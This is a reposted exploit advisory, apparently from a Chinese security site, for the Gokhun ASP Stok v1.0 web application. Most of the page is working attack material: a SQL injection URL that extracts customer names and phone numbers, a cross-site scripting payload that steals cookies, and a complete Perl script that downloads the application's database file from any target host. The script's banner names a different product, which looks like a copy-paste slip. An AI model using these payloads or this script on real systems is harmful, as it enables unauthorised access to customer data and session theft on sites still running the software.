首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Gokhun ASP Stok v1.0 Multiple Remote Vulnerabilities 来源：knockoutr@msn.com 作者：KnocKout 发布时间：2010-09-28   ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [+] Greatz : DaiMon [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~Script : Gokhun ASP Stok v1.0 ~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092 ~Vulnerability Style : Multiple vulnerabilities ~Demo : http://www.site.com/asp/pages/main/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ Explotation ~~~~~~~~~~~ ======== SQL Injection ========= http://[Victim]/?eylemD=urunler&olayD=&islemD=duzenle&kimlikD=1+union+select+0,1,name,ctelephone,4,5,6+from+customers+where+Kimlik=2 ================================== ======= Cross Site Scripting ===== http://[Victim]/?eylemD=hizmetlerimiz&olayD=digerhizmetlerimiz%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E ============================== Remote Database DisClosure Exploit ========================== #!/usr/bin/perl -w # # Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit # Coded: KnocKout # Date: 26.09.2010 # Thanks: DaiMon, BARCOD3 #       use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Vural Portal 2010 Remote Database Disclosure Exploit'); system('color 4'); if(@ARGV < 2) { print "[-]Ornegi inceleyin\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } print "\n************************************************************************\n"; print "\* Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit              *\n"; print "\* Exploited By : KnocKout                                                  *\n"; print "\* msn :   knockoutr[at]msn[dot]com                                 *\n"; print "\* Special Thankz : DaiMon                                      *\n"; print "\*********************************************************************\n\n\n"; ($TargetIP, $path, $File,) = @ARGV; $File="database/yb.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "C:/db.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to C:/db.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Windows Mobile 6.5 TR Phone Ca ·BS.Player 2.56 (Build 1043) .m ·Digital Music Pad Version 8.2. ·PDF Creator Pilot (PDFCreatorP ·iworkstation Version 9.3.2.1.4 ·Realtek (InstallShield-RTCOMDL ·Fox Audio Player 0.8.0 .m3u De ·Yahoo! Messenger 10 (PhotoShar ·Barracuda Networks Spam & Viru ·linux/x86 setreuid(0) and add ·Microsoft Internet Explorer MS ·linux/x86 setreuid(0,0) and ad   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved